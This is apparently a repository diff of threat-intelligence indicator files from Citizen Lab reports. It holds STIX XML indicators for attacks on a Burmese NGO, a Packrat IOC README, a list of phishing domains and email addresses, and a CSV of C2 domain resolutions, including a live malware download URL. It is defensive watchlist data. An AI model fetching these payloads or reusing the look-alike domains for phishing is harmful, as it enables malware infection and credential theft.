<stixCommon:TTP idref=":ttp-581bace8-59d0-4c6e-859a-497a8e96ca05" timestamp="2016-11-03T17:32:24+00:00" xsi:type='ttp:TTPType'/>
</indicator:Indicated_TTP>
<indicator:Indicated_TTP>
<stixCommon:TTP idref=":ttp-581bacf2-d924-45bd-a930-49798e96ca05" timestamp="2016-11-03T17:32:34+00:00" xsi:type='ttp:TTPType'/>
</indicator:Indicated_TTP>
<indicator:Confidence timestamp="2016-11-03T17:31:54+00:00">
<stixCommon:Value xsi:type="stixVocabs:HighMediumLowVocab-1.0">High</stixCommon:Value>
<stixCommon:Description>Derived from MISP's IDS flag. If an attribute is marked for IDS exports, the confidence will be high, otherwise none</stixCommon:Description>
</indicator:Confidence>
</stixCommon:Indicator>
</incident:Related_Indicator>
<incident:Related_Indicator>
<stixCommon:Relationship>Network activity</stixCommon:Relationship>
<stixCommon:Indicator id=":indicator-581bacca-464c-4997-8812-49798e96ca05" timestamp="2016-11-03T17:31:54+00:00" xsi:type='indicator:IndicatorType'>
<indicator:Title>Network activity: usacia.websecexp.com (MISP Attribute #84)</indicator:Title>
<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">Malware Artifacts</indicator:Type>
<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">Domain Watchlist</indicator:Type>
<indicator:Description>Network activity: usacia.websecexp.com (MISP Attribute #84)</indicator:Description>
<indicator:Valid_Time_Position/>
<indicator:Observable id=":observable-581bacca-464c-4997-8812-49798e96ca05">
<cybox:Object id=":DomainName-581bacca-464c-4997-8812-49798e96ca05">
<cybox:Properties xsi:type="DomainNameObj:DomainNameObjectType">
<DomainNameObj:Value condition="Equals">usacia.websecexp.com</DomainNameObj:Value>
</cybox:Properties>
</cybox:Object>
</indicator:Observable>
<indicator:Indicated_TTP>
<stixCommon:TTP idref=":ttp-581bace8-59d0-4c6e-859a-497a8e96ca05" timestamp="2016-11-03T17:32:24+00:00" xsi:type='ttp:TTPType'/>
</indicator:Indicated_TTP>
<indicator:Indicated_TTP>
<stixCommon:TTP idref=":ttp-581bacf2-d924-45bd-a930-49798e96ca05" timestamp="2016-11-03T17:32:34+00:00" xsi:type='ttp:TTPType'/>
</indicator:Indicated_TTP>
<indicator:Confidence timestamp="2016-11-03T17:31:54+00:00">
<stixCommon:Value xsi:type="stixVocabs:HighMediumLowVocab-1.0">High</stixCommon:Value>
<stixCommon:Description>Derived from MISP's IDS flag. If an attribute is marked for IDS exports, the confidence will be high, otherwise none</stixCommon:Description>
</indicator:Confidence>
</stixCommon:Indicator>
</incident:Related_Indicator>
<incident:Related_Indicator>
<stixCommon:Relationship>Network activity</stixCommon:Relationship>
<stixCommon:Indicator id=":indicator-581bacca-5998-41ad-afb4-49798e96ca05" timestamp="2016-11-03T17:31:54+00:00" xsi:type='indicator:IndicatorType'>
<indicator:Title>Network activity: webhttps.websecexp.com (MISP Attribute #85)</indicator:Title>
<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">Malware Artifacts</indicator:Type>
<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">Domain Watchlist</indicator:Type>
<indicator:Description>Network activity: webhttps.websecexp.com (MISP Attribute #85)</indicator:Description>
<indicator:Valid_Time_Position/>
<indicator:Observable id=":observable-581bacca-5998-41ad-afb4-49798e96ca05">
<cybox:Object id=":DomainName-581bacca-5998-41ad-afb4-49798e96ca05">
<cybox:Properties xsi:type="DomainNameObj:DomainNameObjectType">
<DomainNameObj:Value condition="Equals">webhttps.websecexp.com</DomainNameObj:Value>
</cybox:Properties>
</cybox:Object>
</indicator:Observable>
<indicator:Indicated_TTP>
<stixCommon:TTP idref=":ttp-581bace8-59d0-4c6e-859a-497a8e96ca05" timestamp="2016-11-03T17:32:24+00:00" xsi:type='ttp:TTPType'/>
</indicator:Indicated_TTP>
<indicator:Indicated_TTP>
<stixCommon:TTP idref=":ttp-581bacf2-d924-45bd-a930-49798e96ca05" timestamp="2016-11-03T17:32:34+00:00" xsi:type='ttp:TTPType'/>
</indicator:Indicated_TTP>
<indicator:Confidence timestamp="2016-11-03T17:31:54+00:00">
<stixCommon:Value xsi:type="stixVocabs:HighMediumLowVocab-1.0">High</stixCommon:Value>
<stixCommon:Description>Derived from MISP's IDS flag. If an attribute is marked for IDS exports, the confidence will be high, otherwise none</stixCommon:Description>
</indicator:Confidence>
</stixCommon:Indicator>
</incident:Related_Indicator>
<incident:Related_Indicator>
<stixCommon:Relationship>Network activity</stixCommon:Relationship>
<stixCommon:Indicator id=":indicator-5824e58f-be40-407d-b91b-497a8e96ca05" timestamp="2016-11-10T16:24:31+00:00" xsi:type='indicator:IndicatorType'>
<indicator:Title>Network activity: iyouthen.com (MISP Attribute #1877)</indicator:Title>
<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">Malware Artifacts</indicator:Type>
<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">Domain Watchlist</indicator:Type>
<indicator:Description>Network activity: iyouthen.com (MISP Attribute #1877)</indicator:Description>
<indicator:Valid_Time_Position/>
<indicator:Observable id=":observable-5824e58f-be40-407d-b91b-497a8e96ca05">
<cybox:Object id=":DomainName-5824e58f-be40-407d-b91b-497a8e96ca05">
<cybox:Properties xsi:type="DomainNameObj:DomainNameObjectType">
<DomainNameObj:Value condition="Equals">iyouthen.com</DomainNameObj:Value>
</cybox:Properties>
</cybox:Object>
</indicator:Observable>
<indicator:Indicated_TTP>
<stixCommon:TTP idref=":ttp-581bace8-59d0-4c6e-859a-497a8e96ca05" timestamp="2016-11-03T17:32:24+00:00" xsi:type='ttp:TTPType'/>
</indicator:Indicated_TTP>
<indicator:Indicated_TTP>
<stixCommon:TTP idref=":ttp-581bacf2-d924-45bd-a930-49798e96ca05" timestamp="2016-11-03T17:32:34+00:00" xsi:type='ttp:TTPType'/>
</indicator:Indicated_TTP>
<indicator:Confidence timestamp="2016-11-10T16:24:31+00:00">
<stixCommon:Value xsi:type="stixVocabs:HighMediumLowVocab-1.0">High</stixCommon:Value>
<stixCommon:Description>Derived from MISP's IDS flag. If an attribute is marked for IDS exports, the confidence will be high, otherwise none</stixCommon:Description>
</indicator:Confidence>
</stixCommon:Indicator>
</incident:Related_Indicator>
<incident:Related_Indicator>
<stixCommon:Relationship>Network activity</stixCommon:Relationship>
<stixCommon:Indicator id=":indicator-581bacca-ad18-4ff6-b8b5-49798e96ca05" timestamp="2016-11-03T17:31:54+00:00" xsi:type='indicator:IndicatorType'>
<indicator:Title>Network activity: appeur.gnway.cc (MISP Attribute #86)</indicator:Title>
<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">Malware Artifacts</indicator:Type>
<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">Domain Watchlist</indicator:Type>
<indicator:Description>Network activity: appeur.gnway.cc (MISP Attribute #86)</indicator:Description>
<indicator:Valid_Time_Position/>
<indicator:Observable id=":observable-581bacca-ad18-4ff6-b8b5-49798e96ca05">
<cybox:Object id=":DomainName-581bacca-ad18-4ff6-b8b5-49798e96ca05">
<cybox:Properties xsi:type="DomainNameObj:DomainNameObjectType">
<DomainNameObj:Value condition="Equals">appeur.gnway.cc</DomainNameObj:Value>
</cybox:Properties>
</cybox:Object>
</indicator:Observable>
<indicator:Indicated_TTP>
<stixCommon:TTP idref=":ttp-581bace8-59d0-4c6e-859a-497a8e96ca05" timestamp="2016-11-03T17:32:24+00:00" xsi:type='ttp:TTPType'/>
</indicator:Indicated_TTP>
<indicator:Indicated_TTP>
<stixCommon:TTP idref=":ttp-581bacf2-d924-45bd-a930-49798e96ca05" timestamp="2016-11-03T17:32:34+00:00" xsi:type='ttp:TTPType'/>
</indicator:Indicated_TTP>
<indicator:Confidence timestamp="2016-11-03T17:31:54+00:00">
<stixCommon:Value xsi:type="stixVocabs:HighMediumLowVocab-1.0">High</stixCommon:Value>
<stixCommon:Description>Derived from MISP's IDS flag. If an attribute is marked for IDS exports, the confidence will be high, otherwise none</stixCommon:Description>
</indicator:Confidence>
</stixCommon:Indicator>
</incident:Related_Indicator>
<incident:Related_Indicator>
<stixCommon:Relationship>Network activity</stixCommon:Relationship>
<stixCommon:Indicator id=":indicator-581bad77-2c58-479e-833e-497a8e96ca05" timestamp="2016-11-03T17:34:47+00:00" xsi:type='indicator:IndicatorType'>
<indicator:Title>Network activity: t1.mailsecurityservice.com (MISP Attribute #100)</indicator:Title>
<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">Malware Artifacts</indicator:Type>
<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">Domain Watchlist</indicator:Type>
<indicator:Description>Network activity: t1.mailsecurityservice.com (MISP Attribute #100)</indicator:Description>
<indicator:Valid_Time_Position/>
<indicator:Observable id=":observable-581bad77-2c58-479e-833e-497a8e96ca05">
<cybox:Object id=":DomainName-581bad77-2c58-479e-833e-497a8e96ca05">
<cybox:Properties xsi:type="DomainNameObj:DomainNameObjectType">
<DomainNameObj:Value condition="Equals">t1.mailsecurityservice.com</DomainNameObj:Value>
</cybox:Properties>
</cybox:Object>
</indicator:Observable>
<indicator:Indicated_TTP>
<stixCommon:TTP idref=":ttp-581bace8-59d0-4c6e-859a-497a8e96ca05" timestamp="2016-11-03T17:32:24+00:00" xsi:type='ttp:TTPType'/>
</indicator:Indicated_TTP>
<indicator:Indicated_TTP>
<stixCommon:TTP idref=":ttp-581bacf2-d924-45bd-a930-49798e96ca05" timestamp="2016-11-03T17:32:34+00:00" xsi:type='ttp:TTPType'/>
</indicator:Indicated_TTP>
<indicator:Confidence timestamp="2016-11-03T17:34:47+00:00">
<stixCommon:Value xsi:type="stixVocabs:HighMediumLowVocab-1.0">High</stixCommon:Value>
<stixCommon:Description>Derived from MISP's IDS flag. If an attribute is marked for IDS exports, the confidence will be high, otherwise none</stixCommon:Description>
</indicator:Confidence>
</stixCommon:Indicator>
</incident:Related_Indicator>
<incident:Related_Indicator>
<stixCommon:Relationship>Network activity</stixCommon:Relationship>
<stixCommon:Indicator id=":indicator-581bad77-cde8-4c65-9449-497a8e96ca05" timestamp="2016-11-03T17:34:47+00:00" xsi:type='indicator:IndicatorType'>
<indicator:Title>Network activity: t2.mailsecurityservice.com (MISP Attribute #101)</indicator:Title>
<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">Malware Artifacts</indicator:Type>
<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">Domain Watchlist</indicator:Type>
<indicator:Description>Network activity: t2.mailsecurityservice.com (MISP Attribute #101)</indicator:Description>
<indicator:Valid_Time_Position/>
<indicator:Observable id=":observable-581bad77-cde8-4c65-9449-497a8e96ca05">
<cybox:Object id=":DomainName-581bad77-cde8-4c65-9449-497a8e96ca05">
<cybox:Properties xsi:type="DomainNameObj:DomainNameObjectType">
<DomainNameObj:Value condition="Equals">t2.mailsecurityservice.com</DomainNameObj:Value>
</cybox:Properties>
</cybox:Object>
</indicator:Observable>
<indicator:Indicated_TTP>
<stixCommon:TTP idref=":ttp-581bace8-59d0-4c6e-859a-497a8e96ca05" timestamp="2016-11-03T17:32:24+00:00" xsi:type='ttp:TTPType'/>
</indicator:Indicated_TTP>
<indicator:Indicated_TTP>
<stixCommon:TTP idref=":ttp-581bacf2-d924-45bd-a930-49798e96ca05" timestamp="2016-11-03T17:32:34+00:00" xsi:type='ttp:TTPType'/>
</indicator:Indicated_TTP>
<indicator:Confidence timestamp="2016-11-03T17:34:47+00:00">
<stixCommon:Value xsi:type="stixVocabs:HighMediumLowVocab-1.0">High</stixCommon:Value>
<stixCommon:Description>Derived from MISP's IDS flag. If an attribute is marked for IDS exports, the confidence will be high, otherwise none</stixCommon:Description>
</indicator:Confidence>
</stixCommon:Indicator>
</incident:Related_Indicator>
<incident:Related_Indicator>
<stixCommon:Relationship>Network activity</stixCommon:Relationship>
<stixCommon:Indicator id=":indicator-581bad0a-7524-46f8-9d57-497a8e96ca05" timestamp="2016-11-03T17:32:58+00:00" xsi:type='indicator:IndicatorType'>
<indicator:Title>Network activity: 198.44.190.85 (MISP Attribute #89)</indicator:Title>
<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">Malware Artifacts</indicator:Type>
<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">IP Watchlist</indicator:Type>
<indicator:Description>Network activity: 198.44.190.85 (MISP Attribute #89)</indicator:Description>
<indicator:Valid_Time_Position/>
<indicator:Observable id=":observable-581bad0a-7524-46f8-9d57-497a8e96ca05">
<cybox:Object id=":Address-581bad0a-7524-46f8-9d57-497a8e96ca05">
<cybox:Properties xsi:type="AddressObj:AddressObjectType" category="ipv4-addr" is_source="false">
<AddressObj:Address_Value condition="Equals">198.44.190.85</AddressObj:Address_Value>
</cybox:Properties>
</cybox:Object>
</indicator:Observable>
<indicator:Indicated_TTP>
<stixCommon:TTP idref=":ttp-581bace8-59d0-4c6e-859a-497a8e96ca05" timestamp="2016-11-03T17:32:24+00:00" xsi:type='ttp:TTPType'/>
</indicator:Indicated_TTP>
<indicator:Indicated_TTP>
<stixCommon:TTP idref=":ttp-581bacf2-d924-45bd-a930-49798e96ca05" timestamp="2016-11-03T17:32:34+00:00" xsi:type='ttp:TTPType'/>
</indicator:Indicated_TTP>
<indicator:Confidence timestamp="2016-11-03T17:32:58+00:00">
<stixCommon:Value xsi:type="stixVocabs:HighMediumLowVocab-1.0">High</stixCommon:Value>
<stixCommon:Description>Derived from MISP's IDS flag. If an attribute is marked for IDS exports, the confidence will be high, otherwise none</stixCommon:Description>
</indicator:Confidence>
</stixCommon:Indicator>
</incident:Related_Indicator>
<incident:Related_Indicator>
<stixCommon:Relationship>Payload delivery</stixCommon:Relationship>
<stixCommon:Indicator id=":indicator-581bad2c-3a60-4be9-8d21-49798e96ca05" timestamp="2016-11-03T17:33:32+00:00" xsi:type='indicator:IndicatorType'>
<indicator:Title>Payload delivery: 53f81415ccedf453d6e3ebcdc142b966 (MISP Attribute #90)</indicator:Title>
<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">Malware Artifacts</indicator:Type>
<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">File Hash Watchlist</indicator:Type>
<indicator:Description>Payload delivery: 53f81415ccedf453d6e3ebcdc142b966 (MISP Attribute #90)</indicator:Description>
<indicator:Valid_Time_Position/>
<indicator:Observable id=":observable-581bad2c-3a60-4be9-8d21-49798e96ca05">
<cybox:Object id=":File-581bad2c-3a60-4be9-8d21-49798e96ca05">
<cybox:Properties xsi:type="FileObj:FileObjectType">
<FileObj:Hashes>
<cyboxCommon:Hash>
<cyboxCommon:Type condition="Equals" xsi:type="cyboxVocabs:HashNameVocab-1.0">MD5</cyboxCommon:Type>
<cyboxCommon:Simple_Hash_Value condition="Equals">53f81415ccedf453d6e3ebcdc142b966</cyboxCommon:Simple_Hash_Value>
</cyboxCommon:Hash>
</FileObj:Hashes>
</cybox:Properties>
</cybox:Object>
</indicator:Observable>
<indicator:Indicated_TTP>
<stixCommon:TTP idref=":ttp-581bace8-59d0-4c6e-859a-497a8e96ca05" timestamp="2016-11-03T17:32:24+00:00" xsi:type='ttp:TTPType'/>
</indicator:Indicated_TTP>
<indicator:Indicated_TTP>
<stixCommon:TTP idref=":ttp-581bacf2-d924-45bd-a930-49798e96ca05" timestamp="2016-11-03T17:32:34+00:00" xsi:type='ttp:TTPType'/>
</indicator:Indicated_TTP>
<indicator:Confidence timestamp="2016-11-03T17:33:32+00:00">
<stixCommon:Value xsi:type="stixVocabs:HighMediumLowVocab-1.0">None</stixCommon:Value>
<stixCommon:Description>Derived from MISP's IDS flag. If an attribute is marked for IDS exports, the confidence will be high, otherwise none</stixCommon:Description>
</indicator:Confidence>
</stixCommon:Indicator>
</incident:Related_Indicator>
<incident:Related_Indicator>
<stixCommon:Relationship>Payload delivery</stixCommon:Relationship>
<stixCommon:Indicator id=":indicator-581bad2c-e744-4a48-ae12-49798e96ca05" timestamp="2016-11-03T17:33:32+00:00" xsi:type='indicator:IndicatorType'>
<indicator:Title>Payload delivery: 6701662097e274f3cd089ceec35471d2 (MISP Attribute #91)</indicator:Title>
<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">Malware Artifacts</indicator:Type>
<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">File Hash Watchlist</indicator:Type>
<indicator:Description>Payload delivery: 6701662097e274f3cd089ceec35471d2 (MISP Attribute #91)</indicator:Description>
<indicator:Valid_Time_Position/>
<indicator:Observable id=":observable-581bad2c-e744-4a48-ae12-49798e96ca05">
<cybox:Object id=":File-581bad2c-e744-4a48-ae12-49798e96ca05">
<cybox:Properties xsi:type="FileObj:FileObjectType">
<FileObj:Hashes>
<cyboxCommon:Hash>
<cyboxCommon:Type condition="Equals" xsi:type="cyboxVocabs:HashNameVocab-1.0">MD5</cyboxCommon:Type>
<cyboxCommon:Simple_Hash_Value condition="Equals">6701662097e274f3cd089ceec35471d2</cyboxCommon:Simple_Hash_Value>
</cyboxCommon:Hash>
</FileObj:Hashes>
</cybox:Properties>
</cybox:Object>
</indicator:Observable>
<indicator:Indicated_TTP>
<stixCommon:TTP idref=":ttp-581bace8-59d0-4c6e-859a-497a8e96ca05" timestamp="2016-11-03T17:32:24+00:00" xsi:type='ttp:TTPType'/>
</indicator:Indicated_TTP>
<indicator:Indicated_TTP>
<stixCommon:TTP idref=":ttp-581bacf2-d924-45bd-a930-49798e96ca05" timestamp="2016-11-03T17:32:34+00:00" xsi:type='ttp:TTPType'/>
</indicator:Indicated_TTP>
<indicator:Confidence timestamp="2016-11-03T17:33:32+00:00">
<stixCommon:Value xsi:type="stixVocabs:HighMediumLowVocab-1.0">None</stixCommon:Value>
<stixCommon:Description>Derived from MISP's IDS flag. If an attribute is marked for IDS exports, the confidence will be high, otherwise none</stixCommon:Description>
</indicator:Confidence>
</stixCommon:Indicator>
</incident:Related_Indicator>
<incident:Related_Indicator>
<stixCommon:Relationship>Payload delivery</stixCommon:Relationship>
<stixCommon:Indicator id=":indicator-581bad2c-d2d4-46f4-b0cb-49798e96ca05" timestamp="2016-11-03T17:33:32+00:00" xsi:type='indicator:IndicatorType'>
<indicator:Title>Payload delivery: 699b3d90b050cae37f65c855ec7f616a (MISP Attribute #92)</indicator:Title>
<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">Malware Artifacts</indicator:Type>
<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">File Hash Watchlist</indicator:Type>
<indicator:Description>Payload delivery: 699b3d90b050cae37f65c855ec7f616a (MISP Attribute #92)</indicator:Description>
<indicator:Valid_Time_Position/>
<indicator:Observable id=":observable-581bad2c-d2d4-46f4-b0cb-49798e96ca05">
<cybox:Object id=":File-581bad2c-d2d4-46f4-b0cb-49798e96ca05">
<cybox:Properties xsi:type="FileObj:FileObjectType">
<FileObj:Hashes>
<cyboxCommon:Hash>
<cyboxCommon:Type condition="Equals" xsi:type="cyboxVocabs:HashNameVocab-1.0">MD5</cyboxCommon:Type>
<cyboxCommon:Simple_Hash_Value condition="Equals">699b3d90b050cae37f65c855ec7f616a</cyboxCommon:Simple_Hash_Value>
</cyboxCommon:Hash>
</FileObj:Hashes>
</cybox:Properties>
</cybox:Object>
</indicator:Observable>
<indicator:Indicated_TTP>
<stixCommon:TTP idref=":ttp-581bace8-59d0-4c6e-859a-497a8e96ca05" timestamp="2016-11-03T17:32:24+00:00" xsi:type='ttp:TTPType'/>
</indicator:Indicated_TTP>
<indicator:Indicated_TTP>
<stixCommon:TTP idref=":ttp-581bacf2-d924-45bd-a930-49798e96ca05" timestamp="2016-11-03T17:32:34+00:00" xsi:type='ttp:TTPType'/>
</indicator:Indicated_TTP>
<indicator:Confidence timestamp="2016-11-03T17:33:32+00:00">
<stixCommon:Value xsi:type="stixVocabs:HighMediumLowVocab-1.0">None</stixCommon:Value>
<stixCommon:Description>Derived from MISP's IDS flag. If an attribute is marked for IDS exports, the confidence will be high, otherwise none</stixCommon:Description>
</indicator:Confidence>
</stixCommon:Indicator>
</incident:Related_Indicator>
<incident:Related_Indicator>
<stixCommon:Relationship>Payload delivery</stixCommon:Relationship>
<stixCommon:Indicator id=":indicator-5824e5f1-d174-487e-9156-497a8e96ca05" timestamp="2016-11-10T16:26:09+00:00" xsi:type='indicator:IndicatorType'>
<indicator:Title>Payload delivery: http://www.hjclub.info/bbs/uploadfiles/45/ca-bundle.exe (MISP Attribute #1878)</indicator:Title>
<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">Malware Artifacts</indicator:Type>
<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">URL Watchlist</indicator:Type>
<indicator:Description>Payload delivery: http://www.hjclub.info/bbs/uploadfiles/45/ca-bundle.exe (MISP Attribute #1878)</indicator:Description>
<indicator:Valid_Time_Position/>
<indicator:Observable id=":observable-5824e5f1-d174-487e-9156-497a8e96ca05">
<cybox:Object id=":URI-5824e5f1-d174-487e-9156-497a8e96ca05">
<cybox:Properties xsi:type="URIObj:URIObjectType">
<URIObj:Value condition="Equals">http://www.hjclub.info/bbs/uploadfiles/45/ca-bundle.exe</URIObj:Value>
</cybox:Properties>
</cybox:Object>
</indicator:Observable>
<indicator:Indicated_TTP>
<stixCommon:TTP idref=":ttp-581bace8-59d0-4c6e-859a-497a8e96ca05" timestamp="2016-11-03T17:32:24+00:00" xsi:type='ttp:TTPType'/>
</indicator:Indicated_TTP>
<indicator:Indicated_TTP>
<stixCommon:TTP idref=":ttp-581bacf2-d924-45bd-a930-49798e96ca05" timestamp="2016-11-03T17:32:34+00:00" xsi:type='ttp:TTPType'/>
</indicator:Indicated_TTP>
<indicator:Confidence timestamp="2016-11-10T16:26:09+00:00">
<stixCommon:Value xsi:type="stixVocabs:HighMediumLowVocab-1.0">High</stixCommon:Value>
<stixCommon:Description>Derived from MISP's IDS flag. If an attribute is marked for IDS exports, the confidence will be high, otherwise none</stixCommon:Description>
</indicator:Confidence>
</stixCommon:Indicator>
</incident:Related_Indicator>
</incident:Related_Indicators>
<incident:Leveraged_TTPs>
<incident:Leveraged_TTP>
<stixCommon:Relationship>Payload type</stixCommon:Relationship>
<stixCommon:TTP idref=":ttp-581bace8-59d0-4c6e-859a-497a8e96ca05" timestamp="2016-11-03T17:32:24+00:00" xsi:type='ttp:TTPType'/>
</incident:Leveraged_TTP>
<incident:Leveraged_TTP>
<stixCommon:Relationship>Payload type</stixCommon:Relationship>
<stixCommon:TTP idref=":ttp-581bacf2-d924-45bd-a930-49798e96ca05" timestamp="2016-11-03T17:32:34+00:00" xsi:type='ttp:TTPType'/>
</incident:Leveraged_TTP>
</incident:Leveraged_TTPs>
<incident:History>
<incident:History_Item>
<incident:Journal_Entry time_precision="second">Event Threat Level: High</incident:Journal_Entry>
</incident:History_Item>
<incident:History_Item>
<incident:Journal_Entry time_precision="second">MISP Tag: TLP:GREEN</incident:Journal_Entry>
</incident:History_Item>
<incident:History_Item>
<incident:Journal_Entry time_precision="second">MISP Tag: SOURCE:CITIZENLAB</incident:Journal_Entry>
</incident:History_Item>
<incident:History_Item>
<incident:Journal_Entry time_precision="second">MISP Tag: DETECT</incident:Journal_Entry>
</incident:History_Item>
<incident:History_Item>
<incident:Journal_Entry time_precision="second">MISP Tag: PUBLISHED</incident:Journal_Entry>
</incident:History_Item>
</incident:History>
<incident:Information_Source>
<stixCommon:Identity>
<stixCommon:Name>citizenlab</stixCommon:Name>
</stixCommon:Identity>
<stixCommon:References>
<stixCommon:Reference>https://citizenlab.org/2015/10/targeted-attacks-ngo-burma/</stixCommon:Reference>
</stixCommon:References>
</incident:Information_Source>
<incident:Handling>
<marking:Marking>
<marking:Controlled_Structure>../../../descendant-or-self::node()</marking:Controlled_Structure>
<marking:Marking_Structure xsi:type='tlpMarking:TLPMarkingStructureType' color="GREEN"/>
</marking:Marking>
</incident:Handling>
</stix:Incident>
</stix:Incidents>
</stix:Package>
</stix:Related_Package>
</stix:Related_Packages>
</stix:STIX_Package>

View File

@@ -0,0 +1,11 @@
## Packrat IOCs
This directory contains IOC from the Citizen Lab report ["Packrat: Seven Years of a South American Threat Actor"](https://citizenlab.org/2015/12/packrat-report/) published the 8th of December 2015.
Files included in this directory:
* openioc.ioc : IOCs in OpenIOC format
* stix.xml : IOCs in STIX XML format
* iocs.csv : IOCs in csv format
* domains.csv - list of domain, ip resolution at time of investigation and relevant date
* md5-c2.csv - list of MD5 hashes and their associated malware family and command and control server domains
* assorted.csv - additional miscellaneous indicators of compromise.

View File

@@ -0,0 +1,65 @@
android-flash.com
apaezb@tutanota.com
autorizacion-gmail.com
bit.ly/1wl3YE2
blackboxmusic.co
boletin@no-creo.info
carlosuurbina@gmail.com
confirmation-blackberry.com
confirmation-facebook.com
confirmation-icloud.com
confirmation-outlook.com
confirmation-twitter.com
confirmation-yahoo.com
deyrep.com
ecuadorenvivo.co
emilio.palacio35@gmail.com
focusecuador.tk
focusedtior1@gmail
guillermolasso@tutanota.com
idapaez@outlook.com
info@no-creo.info
inyurl.com/q4kaf68
janethehinostroza@hotmail.com
justicia-desvinculados.com
lavozamericana.info
lavozamericana.info
login-office365.com
login-office365.com
login-outlook.com
logon-outlook.com
main-local-latam-soporte-widget.cu9.co
main-local-latam-widget-soporte.cu9.co
mgoogle.us
movimiento.anti.correista@gmail.com
movimientoanticorreista.com
no-creo.info
no.response.delivery.es@gmail.com
no.response.delivery.us@gmail.com
noticias@ecuadorenvivo.co
oficinacarlosvera@hotmail.com
Pancaliente.info
periodistasnarcos@gmail.com
soporte-gmail.com
soporte-login-account-gmail.tk
soporte-login-account-yahoo.tk
soporte-main-local-latam-es.cu9.co
soporte-main-local-latam-us.cu9.co
soporte-yahoo.com
soporte@gm-2013.twomini.com
suport-team@us-gooogle.ws
support-gmail.com
support-java.com
support-login-validate-outlook.tk
support-whatsapp.com
support-whatsapp.com
tinyurl.com/ol6qzec
tinyurl.com/pl843ws
tinyurl.com/px28gsa
tinyurl.com/q3zdyk8
tinyurl.com/q4kaf68
tinyurl.com/qxzz6ky
update-outlook.info
us-main-local-latam-soporte-widget.cu9.co
verify-gmail-support-secure.tk
web-google.cu9.co
1 android-flash.com
2 apaezb@tutanota.com
3 autorizacion-gmail.com
4 bit.ly/1wl3YE2
5 blackboxmusic.co
6 boletin@no-creo.info
7 carlosuurbina@gmail.com
8 confirmation-blackberry.com
9 confirmation-facebook.com
10 confirmation-icloud.com
11 confirmation-outlook.com
12 confirmation-twitter.com
13 confirmation-yahoo.com
14 deyrep.com
15 ecuadorenvivo.co
16 emilio.palacio35@gmail.com
17 focusecuador.tk
18 focusedtior1@gmail
19 guillermolasso@tutanota.com
20 idapaez@outlook.com
21 info@no-creo.info
22 inyurl.com/q4kaf68
23 janethehinostroza@hotmail.com
24 justicia-desvinculados.com
25 lavozamericana.info
26 lavozamericana.info
27 login-office365.com
28 login-office365.com
29 login-outlook.com
30 logon-outlook.com
31 main-local-latam-soporte-widget.cu9.co
32 main-local-latam-widget-soporte.cu9.co
33 mgoogle.us
34 movimiento.anti.correista@gmail.com
35 movimientoanticorreista.com
36 no-creo.info
37 no.response.delivery.es@gmail.com
38 no.response.delivery.us@gmail.com
39 noticias@ecuadorenvivo.co
40 oficinacarlosvera@hotmail.com
41 Pancaliente.info
42 periodistasnarcos@gmail.com
43 soporte-gmail.com
44 soporte-login-account-gmail.tk
45 soporte-login-account-yahoo.tk
46 soporte-main-local-latam-es.cu9.co
47 soporte-main-local-latam-us.cu9.co
48 soporte-yahoo.com
49 soporte@gm-2013.twomini.com
50 suport-team@us-gooogle.ws
51 support-gmail.com
52 support-java.com
53 support-login-validate-outlook.tk
54 support-whatsapp.com
55 support-whatsapp.com
56 tinyurl.com/ol6qzec
57 tinyurl.com/pl843ws
58 tinyurl.com/px28gsa
59 tinyurl.com/q3zdyk8
60 tinyurl.com/q4kaf68
61 tinyurl.com/qxzz6ky
62 update-outlook.info
63 us-main-local-latam-soporte-widget.cu9.co
64 verify-gmail-support-secure.tk
65 web-google.cu9.co

View File

@@ -0,0 +1,23 @@
Domain,Relevant resolution,Relevant date
deyrep24.ddns.net,50.62.133.49,"November 7th, 2014"
deyrep24.ddns.net,192.169.243.65,"March 3rd, 2015"
daynews.sytes.net,192.169.243.65,"March 3rd, 2015"
daynews.sytes.net,190.20.180.181,"March 1st, 2015"
taskmgr.serveftp.com,190.210.180.181,"August 11th, 2014"
taskmgr.serveftp.com,201.52.24.126,"July 23rd, 2014"
taskmgr.serveftp.com,186.220.1.84,July 11th 2014
taskmgr.servehttp.com,186.220.1.84,"June 24th, 2014"
taskmgr.servehttp.com,201.52.24.126,"July 23rd, 2014"
taskmgr.servehttp.com,186.220.1.84,July 11th 2014
taskmgr.servehttp.com,186.220.11.67,"August 15th, 2014"
taskmgr.redirectme.com,201.52.24.126,"July 23rd, 2014"
taskmgr.redirectme.com,186.220.1.84,July 11th 2014
ruley.no-ip.org,186.220.1.84,July 11th 2014
ruley.no-ip.org,189.100.148.188,"September 6th, 2012"
lolinha.no-ip.org,189.100.148.188,"September 6th, 2012"
wjwj.no-ip.org,189.100.148.188,"September 6th, 2012"
conhost.servehttp.com,186.220.11.67,"August 15th, 2014"
dllhost.servehttp.com,186.220.11.67,"August 15th, 2014"
wjwjwj.no-ip.org,179.208.187.216,"March 25th, 2014"
wjwjwj.no-ip.org,186.220.1.84,"June 24th, 2014"
wjwjwjwj.no-ip.org,179.208.187.216,"March 25th, 2014"
1 Domain Relevant resolution Relevant date
2 deyrep24.ddns.net 50.62.133.49 November 7th, 2014
3 deyrep24.ddns.net 192.169.243.65 March 3rd, 2015
